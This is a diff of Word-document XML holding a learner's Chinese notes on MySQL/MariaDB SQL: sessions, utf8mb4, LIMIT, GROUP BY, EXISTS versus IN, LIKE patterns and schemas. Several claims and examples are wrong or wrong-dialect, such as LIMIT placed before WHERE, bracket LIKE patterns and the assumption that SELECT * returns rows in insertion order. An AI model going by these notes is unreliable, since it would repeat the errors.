-      <w:r>
-        <w:t>MariaDB [test2]&gt; select * from test order by birthday;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>+-----------+----------+</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">| name      | </w:t>
-      </w:r>
-      <w:r>
-        <w:t>birthday |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>+-----------+----------+</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">| </w:t>
-      </w:r>
-      <w:r>
-        <w:t>转存表</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">    |        2 |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>| a         |        2 |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>| b         |        3 |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>| c         |        4 |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>| e         |        5 |</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>+-----------+----------+</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>5 rows in set (0.00 sec)</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>MariaDB [test2]&gt; insert into test set name='f</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>',</w:t>
-      </w:r>
-      <w:r>
-        <w:t>birthdat</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>=2;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>ERROR 1054 (42S22): Unknown column 'birthdat' in 'field list'</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>编码：</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>MySQL</w:t>
-      </w:r>
-      <w:r>
-        <w:t>在</w:t>
-      </w:r>
-      <w:r>
-        <w:t>5.5.3</w:t>
-      </w:r>
-      <w:r>
-        <w:t>之后增加了这个</w:t>
-      </w:r>
-      <w:r>
-        <w:t>utf8mb4</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的编码，</w:t>
-      </w:r>
-      <w:r>
-        <w:t>mb4</w:t>
-      </w:r>
-      <w:r>
-        <w:t>就是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>most bytes 4</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的意思，专门用来兼容四字节的</w:t>
-      </w:r>
-      <w:r>
-        <w:t>unicode</w:t>
-      </w:r>
-      <w:r>
-        <w:t>。好在</w:t>
-      </w:r>
-      <w:r>
-        <w:t>utf8mb4</w:t>
-      </w:r>
-      <w:r>
-        <w:t>是</w:t>
-      </w:r>
-      <w:r>
-        <w:t>utf8</w:t>
-      </w:r>
-      <w:r>
-        <w:t>的超集，除了将编码改为</w:t>
-      </w:r>
-      <w:r>
-        <w:t>utf8mb4</w:t>
-      </w:r>
-      <w:r>
-        <w:t>外不需要做其他转换。当然，为了节省空间，一般情况下使用</w:t>
-      </w:r>
-      <w:r>
-        <w:t>utf8</w:t>
-      </w:r>
-      <w:r>
-        <w:t>也就够了。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>创建出来的叫做影子表</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>update exam set answer='</w:t>
+      </w:r>
+      <w:r>
+        <w:t>五指分开</w:t>
+      </w:r>
+      <w:r>
+        <w:t>',A=0,B=1 where question='</w:t>
+      </w:r>
+      <w:r>
+        <w:t>单选题：发上手飘球时，击球的时候应（</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>）。</w:t>
+      </w:r>
+      <w:r>
+        <w:t>';</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">select * from table limit </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>m,n</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>SELECT * FROM route LIMIT 10</w:t>
+      </w:r>
+      <w:r>
+        <w:t>查询前</w:t>
+      </w:r>
+      <w:r>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:t>条（</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">&lt;=&gt;0,10 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>表示从第一条记录开始的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>10</w:t>
+      </w:r>
+      <w:r>
+        <w:t>条记录。注意这里数数是从</w:t>
+      </w:r>
+      <w:r>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:t>开始。所以就能使用程序</w:t>
+      </w:r>
+      <w:r>
+        <w:t>0,20   20,40  40,60</w:t>
+      </w:r>
+      <w:r>
+        <w:t>这样）</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>order/group by</w:t>
+      </w:r>
+      <w:r>
+        <w:t>加上要排序的字段</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">group by </w:t>
+      </w:r>
+      <w:r>
+        <w:t>是排序以后同值合并，而不是分组。常用于对消费记录表进行统计</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SELECT Customer,SUM(OrderPrice) FROM Orders GROUP BY Customer</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>不够</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">group by </w:t>
+      </w:r>
+      <w:r>
+        <w:t>与</w:t>
+      </w:r>
+      <w:r>
+        <w:t>GROUP_CONCAT</w:t>
+      </w:r>
+      <w:r>
+        <w:t>共同使用就是很好的分组显示，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>SELECT sex,GROUP_CONCAT(name) FROM employee GROUP BY sex;</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>select * from birth order by birthday limit 3 where birthday&gt;311</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>order by</w:t>
+      </w:r>
+      <w:r>
+        <w:t>与</w:t>
+      </w:r>
+      <w:r>
+        <w:t>limit</w:t>
+      </w:r>
+      <w:r>
+        <w:t>必须要是在最后面</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>insert into test set birthday=2 where name ='</w:t>
+      </w:r>
+      <w:r>
+        <w:t>转存表</w:t>
+      </w:r>
+      <w:r>
+        <w:t>';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>如果这个</w:t>
+      </w:r>
+      <w:r>
+        <w:t>name</w:t>
+      </w:r>
+      <w:r>
+        <w:t>已经存在就会报错，这条语句不能起到</w:t>
+      </w:r>
+      <w:r>
+        <w:t>update</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的作用。</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>我在想会不会有人开着数据库的端口，而且密码还是默认的空？！</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">select * </w:t>
+      </w:r>
+      <w:r>
+        <w:t>的时候越下面的记录越是最近插进去的</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>predicate:</w:t>
+      </w:r>
+      <w:r>
+        <w:t>判定条件</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:t>引导的子句只能返回一个字段</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">exists </w:t>
+      </w:r>
+      <w:r>
+        <w:t>（</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">sql </w:t>
+      </w:r>
+      <w:r>
+        <w:t>返回结果集为真）</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>而不管结果集返回的是什么。与</w:t>
+      </w:r>
+      <w:r>
+        <w:t>IN</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的区别是可以返回一个结果集</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">not exists (sql </w:t>
+      </w:r>
+      <w:r>
+        <w:t>不返回结果集为真）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>SELECT ID,NAME FROM A</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">　</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> WHERE</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">　</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ID IN (SELECT AID FROM B) </w:t>
+      </w:r>
+      <w:r>
+        <w:t>《</w:t>
+      </w:r>
+      <w:r>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>》</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE A.ID=B.AID) </w:t>
+      </w:r>
+      <w:r>
+        <w:t>配合连接子查询</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>据说</w:t>
+      </w:r>
+      <w:r>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的效率查找起来比</w:t>
+      </w:r>
+      <w:r>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:t>好，应该是不会执行索引的原因</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>下面是对</w:t>
+      </w:r>
+      <w:r>
+        <w:t>exists</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的理解：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>表</w:t>
+      </w:r>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">ID NAME </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>1   A1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2   A2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3   A3</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>表</w:t>
+      </w:r>
+      <w:r>
+        <w:t>B</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ID AID NAME</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>1   1     B1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">2   2     B2 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3   2     B3</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>表</w:t>
+      </w:r>
+      <w:r>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:t>和表</w:t>
+      </w:r>
+      <w:r>
+        <w:t>B</w:t>
+      </w:r>
+      <w:r>
+        <w:t>是１对多的关系</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> A.ID =&gt; B.AID</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ID,NAME</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE A.ID=B.AID)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>执行结果为</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>1 A1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2 A2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>原因可以按照如下分析</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>SELECT ID,NAME FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>１</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>１有值返回真所以有数据</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ID,NAME</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>２有值返回真所以有数据</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>ID,NAME</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> FROM A WHERE EXISTS (SELECT * FROM B WHERE B.AID=3)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>---&gt;SELECT * FROM B WHERE B.AID=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>３无值返回真所以没有数据</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>查询：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>1.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>在查询结果中显示列名：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>a.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>as</w:t>
+      </w:r>
+      <w:r>
+        <w:t>关键字：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select name as ’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>姓名</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’from students order by age</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>b.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>直接表示：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select name ’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>姓名</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’from students order by age</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>2.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>精确查找</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>a.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:t>限定范围：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select * from students where native in (’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>湖南</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’, ’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>四川</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>b.between...and</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select * from students where age between 20 and 30</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>c.“</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=”</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select * from students where name = ’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>李山</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>d.like:select * from students where name like ’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>李</w:t>
+      </w:r>
+      <w:r>
+        <w:t>%’(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>注意查询条件中有</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“%”</w:t>
+      </w:r>
+      <w:r>
+        <w:t>，则说明是部分匹配，而且还有先后信息在里面，即查找以</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:t>李</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t>开头的匹配项。所以若查询有</w:t>
+      </w:r>
+      <w:r>
+        <w:t>“</w:t>
+      </w:r>
+      <w:r>
+        <w:t>李</w:t>
+      </w:r>
+      <w:r>
+        <w:t>”</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的所有对象，应该命令：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’%</w:t>
+      </w:r>
+      <w:r>
+        <w:t>李</w:t>
+      </w:r>
+      <w:r>
+        <w:t>%’;</w:t>
+      </w:r>
+      <w:r>
+        <w:t>若是第二个字为李，则应为</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’_</w:t>
+      </w:r>
+      <w:r>
+        <w:t>李</w:t>
+      </w:r>
+      <w:r>
+        <w:t>%’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>或</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’_</w:t>
+      </w:r>
+      <w:r>
+        <w:t>李</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>或</w:t>
+      </w:r>
+      <w:r>
+        <w:t>’_</w:t>
+      </w:r>
+      <w:r>
+        <w:t>李</w:t>
+      </w:r>
+      <w:r>
+        <w:t>_’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。</w:t>
+      </w:r>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>e.[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:t>匹配检查符：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select * from courses where cno like ’[AC]%’(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>表示或的关系，与</w:t>
+      </w:r>
+      <w:r>
+        <w:t>"in(...)"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>类似，而且</w:t>
+      </w:r>
+      <w:r>
+        <w:t>"[]"</w:t>
+      </w:r>
+      <w:r>
+        <w:t>可以表示范围，如：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select * from courses where cno like ’[A-C]%’)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>3.</w:t>
+      </w:r>
+      <w:r>
+        <w:t>对于时间类型变量的处理</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>a.smalldatetime</w:t>
+      </w:r>
+      <w:r>
+        <w:t>：直接按照字符串处理的方式进行处理，例如：</w:t>
+      </w:r>
+      <w:r>
+        <w:t>select * from students where birth &gt; = ’1980-1-1’and birth &lt;= ’1980-12-31’</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。不过我是采用了数字型的判断，如果日期采用字符串型的判断就需要将同一长度，就像身份证中间那样。</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>默认情况下一个用户对应一个集合，用户的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>schema</w:t>
+      </w:r>
+      <w:r>
+        <w:t>名等于用户名，并作为该用户缺省</w:t>
+      </w:r>
+      <w:r>
+        <w:t>schema</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。所以</w:t>
+      </w:r>
+      <w:r>
+        <w:t>schema</w:t>
+      </w:r>
+      <w:r>
+        <w:t>集合看上去像用户名。我们访问一个表时，没有指明该表属于哪一个</w:t>
+      </w:r>
+      <w:r>
+        <w:t>schema</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中的，系统就会自动给我们在表上加上缺省的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>shema</w:t>
+      </w:r>
+      <w:r>
+        <w:t>名。这一点</w:t>
+      </w:r>
+      <w:r>
+        <w:t>postgres</w:t>
+      </w:r>
+      <w:r>
+        <w:t>中可以体会到。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>模式的定义</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">CREATE SCHEMA schemaname [ AUTHORIZATION </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>username ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> [ schema_element [ ... ] </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">CREATE SCHEMA AUTHORIZATION username [ schema_element [ </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>... ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">DROP SCHEMA name [, ...] [ CASCADE | </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>RESTRICT ]</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>MariaDB [test2]&gt; select * from test order by birthday;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+-----------+----------+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| name      | birthday |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+-----------+----------+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">| </w:t>
+      </w:r>
+      <w:r>
+        <w:t>转存表</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">    |        2 |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| a         |        2 |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| b         |        3 |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| c         |        4 |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>| e         |        5 |</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>+-----------+----------+</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>5 rows in set (0.00 sec)</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>MariaDB [test2]&gt; insert into test set name='f</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>',birthdat</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>=2;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>ERROR 1054 (42S22): Unknown column 'birthdat' in 'field list'</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>编码：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>在</w:t>
+      </w:r>
+      <w:r>
+        <w:t>5.5.3</w:t>
+      </w:r>
+      <w:r>
+        <w:t>之后增加了这个</w:t>
+      </w:r>
+      <w:r>
+        <w:t>utf8mb4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的编码，</w:t>
+      </w:r>
+      <w:r>
+        <w:t>mb4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>就是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>most bytes 4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的意思，专门用来兼容四字节的</w:t>
+      </w:r>
+      <w:r>
+        <w:t>unicode</w:t>
+      </w:r>
+      <w:r>
+        <w:t>。好在</w:t>
+      </w:r>
+      <w:r>
+        <w:t>utf8mb4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>是</w:t>
+      </w:r>
+      <w:r>
+        <w:t>utf8</w:t>
+      </w:r>
+      <w:r>
+        <w:t>的超集，除了将编码改为</w:t>
+      </w:r>
+      <w:r>
+        <w:t>utf8mb4</w:t>
+      </w:r>
+      <w:r>
+        <w:t>外不需要做其他转换。当然，为了节省空间，一般情况下使用</w:t>
+      </w:r>
+      <w:r>
+        <w:t>utf8</w:t>
+      </w:r>
+      <w:r>
+        <w:t>也就够了。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:t xml:space="preserve">SHOW VARIABLES LIKE 'character_set_%'; </w:t>
       </w:r>
       <w:r>
-        <w:t>然</w:t>
-      </w:r>
-      <w:r>
-        <w:t>后不是</w:t>
+        <w:t>然后不是</w:t>
       </w:r>
       <w:r>
         <w:t>utf8</w:t>
@@ -11448,8 +10813,6 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:t>)</w:t>
       </w:r>
@@ -11495,11 +10858,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
@@ -11522,13 +10880,7 @@
         <w:t>文件在启动的时候没有，数据库启动失败</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:t>安全：</w:t>
@@ -11597,10 +10949,7 @@
         <w:t>，</w:t>
       </w:r>
       <w:r>
-        <w:t>MED</w:t>
-      </w:r>
-      <w:r>
-        <w:t>IUMINT</w:t>
+        <w:t>MEDIUMINT</w:t>
       </w:r>
       <w:r>
         <w:t>，</w:t>
@@ -11901,10 +11250,7 @@
         <w:t>个字符，把它定义为</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> VAR</w:t>
-      </w:r>
-      <w:r>
-        <w:t>CHAR(10)</w:t>
+        <w:t xml:space="preserve"> VARCHAR(10)</w:t>
       </w:r>
       <w:r>
         <w:t>是最合算的。</w:t>
@@ -11987,10 +11333,7 @@
         <w:t xml:space="preserve"> int(4) </w:t>
       </w:r>
       <w:r>
-        <w:t>在硬盘中所占的字节数都是一样的。区别在于如果列制定</w:t>
-      </w:r>
-      <w:r>
-        <w:t>了</w:t>
+        <w:t>在硬盘中所占的字节数都是一样的。区别在于如果列制定了</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">zerofill </w:t>
@@ -12246,10 +11589,7 @@
